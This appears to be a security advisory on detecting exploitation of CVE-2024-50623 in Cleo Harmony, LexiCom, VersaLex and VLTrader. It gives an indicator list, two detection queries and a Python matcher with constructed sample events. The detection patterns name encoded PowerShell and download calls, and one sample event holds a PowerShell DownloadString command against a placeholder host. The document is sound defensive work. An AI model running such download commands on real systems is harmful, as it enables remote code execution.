Date: 12/16/2024
Severity: Medium
Summary
CVE-2024-50623 is a security vulnerability in the Cleo software suite (Harmony, LexiCom, VersaLex, VLTrader) that attackers are actively targeting. An exploitation attempt is identified by monitoring for a "cmd.exe" process launched from Cleo's Java process (javaw.exe); a command shell spawned by the application is itself often indicative of malicious activity. A suspicious PowerShell command line associated with that process (for example an encoded command or a download call) is a further key sign of exploitation. Together, this behavior suggests that an attacker is attempting to execute arbitrary commands or gain unauthorized access to the system through the vulnerability.
Indicators of Compromise (IOC) List
Field             | Value(s)
ParentImage       | '\javaw.exe'
ParentCommandLine | 'Harmony', 'lexicom', 'VersaLex', 'VLTrader'
Image             | '\cmd.exe'
CommandLine       | 'powershell', ' -enc ', ' -EncodedCommand', '.Download'
Gurucul Threat Detection and Incident Response (TDIR) Queries for Detection
Detection Query 1 (Sysmon process-creation events, Event ID 1) | (((((resourcename in ("Sysmon") AND eventtype = "1") AND parentimage in ("\javaw.exe")) AND parentcommandline IN ("Harmony","lexicom","VersaLex","VLTrader")) AND image = "\cmd.exe") AND commandline in ("powershell","-enc ","-EncodedCommand",".Download"))
Detection Query 2 (EDR process telemetry) | (((((technologygroup = "EDR") AND parentimage in ("\javaw.exe")) AND parentcommandline IN ("Harmony","lexicom","VersaLex","VLTrader")) AND image = "\cmd.exe") AND commandline in ("powershell","-enc ","-EncodedCommand",".Download"))
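The same detection logic expressed as a small Python matcher, run over a few constructed process-creation events. This is an added example, not Gurucul's query engine or the SigmaHQ rule itself; it assumes the IOC values are matched the way the referenced Sigma rule matches them (image fields by suffix, command lines by substring, case-insensitively), and the sample events, paths and hostnames are constructed for illustration.

```python
"""Matcher for the CVE-2024-50623 Cleo exploitation-attempt pattern.

Added example, not the vendor's or SigmaHQ's code. Assumption: ParentImage
and Image are matched by suffix, ParentCommandLine and CommandLine by
substring, all case-insensitively (the way Sigma string modifiers behave on
Windows telemetry). Sample events below are constructed, not real logs.
"""
from dataclasses import dataclass
from typing import List

# IOC values taken from the page's IOC list.
PARENT_IMAGE_SUFFIXES = ("\\javaw.exe",)
PARENT_CMDLINE_MARKERS = ("Harmony", "lexicom", "VersaLex", "VLTrader")
IMAGE_SUFFIXES = ("\\cmd.exe",)
CMDLINE_MARKERS = ("powershell", " -enc ", " -EncodedCommand", ".Download")


@dataclass
class ProcessCreateEvent:
    """Subset of Sysmon Event ID 1 (process creation) fields used by the rule."""
    host: str
    parent_image: str
    parent_command_line: str
    image: str
    command_line: str


def _ends_with_any(value: str, suffixes) -> bool:
    v = value.lower()
    return any(v.endswith(s.lower()) for s in suffixes)


def _contains_any(value: str, needles) -> bool:
    v = value.lower()
    return any(n.lower() in v for n in needles)


def is_cleo_exploit_attempt(ev: ProcessCreateEvent) -> bool:
    """All four IOC conditions must hold, mirroring the AND chain in the queries."""
    return (
        _ends_with_any(ev.parent_image, PARENT_IMAGE_SUFFIXES)
        and _contains_any(ev.parent_command_line, PARENT_CMDLINE_MARKERS)
        and _ends_with_any(ev.image, IMAGE_SUFFIXES)
        and _contains_any(ev.command_line, CMDLINE_MARKERS)
    )


def matched_markers(ev: ProcessCreateEvent) -> List[str]:
    """Command-line markers that fired, for analyst context; empty if no match."""
    if not is_cleo_exploit_attempt(ev):
        return []
    cl = ev.command_line.lower()
    return [m for m in CMDLINE_MARKERS if m.lower() in cl]


def triage(events: List[ProcessCreateEvent]) -> List[ProcessCreateEvent]:
    """Return only the events that match the detection, in input order."""
    return [ev for ev in events if is_cleo_exploit_attempt(ev)]


# Constructed sample telemetry (hypothetical hosts, paths and command lines).
SAMPLE_EVENTS = [
    # 1: Cleo VLTrader's javaw.exe spawns cmd.exe running an encoded PowerShell command -> match
    ProcessCreateEvent(
        "mft01", r"C:\VLTrader\jre\bin\javaw.exe",
        r'"C:\VLTrader\jre\bin\javaw.exe" -jar VLTrader.jar',
        r"C:\Windows\System32\cmd.exe", "cmd.exe /c powershell -enc AAAA"),
    # 2: same parent, but a plain directory listing -> no suspicious command-line marker
    ProcessCreateEvent(
        "mft01", r"C:\VLTrader\jre\bin\javaw.exe",
        r'"C:\VLTrader\jre\bin\javaw.exe" -jar VLTrader.jar',
        r"C:\Windows\System32\cmd.exe", r"cmd.exe /c dir C:\VLTrader\logs"),
    # 3: an unrelated Java application launching PowerShell -> parent is not a Cleo product
    ProcessCreateEvent(
        "build02", r"C:\Program Files\Java\bin\javaw.exe",
        r'"C:\Program Files\Java\bin\javaw.exe" -jar buildtool.jar',
        r"C:\Windows\System32\cmd.exe", "cmd.exe /c powershell -enc AAAA"),
    # 4: Cleo Harmony spawning cmd.exe with a PowerShell download call -> match
    ProcessCreateEvent(
        "mft02", r"C:\Harmony\jre\bin\javaw.exe",
        r'"C:\Harmony\jre\bin\javaw.exe" -jar Harmony.jar',
        r"C:\Windows\SysWOW64\cmd.exe",
        "cmd /c powershell.exe (New-Object Net.WebClient).DownloadString('http://example.invalid/')"),
]

if __name__ == "__main__":
    for hit in triage(SAMPLE_EVENTS):
        print(f"ALERT host={hit.host} markers={matched_markers(hit)} cmd={hit.command_line!r}")
```

Events 2 and 3 show the two main false-positive guards the rule relies on: a Cleo-spawned shell with no PowerShell marker, and a PowerShell-spawning shell whose parent is not a Cleo product. Either alone does not fire; both conditions together do.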
Reference:
https://github.com/SigmaHQ/sigma/blob/master/rules-emerging-threats/2024/Exploits/CVE-2024-50623/proc_creation_win_exploit_cve_2024_50623_cleo.yml